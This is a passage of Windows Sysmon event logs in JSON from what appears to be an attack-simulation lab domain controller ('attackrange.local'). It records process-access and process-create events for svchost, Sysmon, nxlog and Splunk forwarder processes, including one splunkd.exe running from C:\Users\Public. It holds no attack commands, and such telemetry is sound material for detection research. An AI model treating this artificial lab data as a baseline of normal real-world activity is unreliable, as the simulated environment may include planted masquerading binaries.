C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8831,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8832,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8833,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:57.998\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A1-5F25-0000-001005A71000}\r\nTargetProcessId: 2968\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:57.998","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-13A1-5F25-0000-001005A71000}","TargetProcessId":"2968","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8834,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:58.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:58.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8835,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.030\r\nProcessGuid: {E2A3D6B1-13A3-5F25-0000-001040A91000}\r\nProcessId: 796\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.030","ProcessGuid":"{E2A3D6B1-13A3-5F25-0000-001040A91000}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8836,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-001040A91000}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001040A91000}","TargetProcessId":"796","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8837,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A3-5F25-0000-001040A91000}\r\nTargetProcessId: 796\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:59.029","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A3-5F25-0000-001040A91000}","TargetProcessId":"796","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8838,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:59.029\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 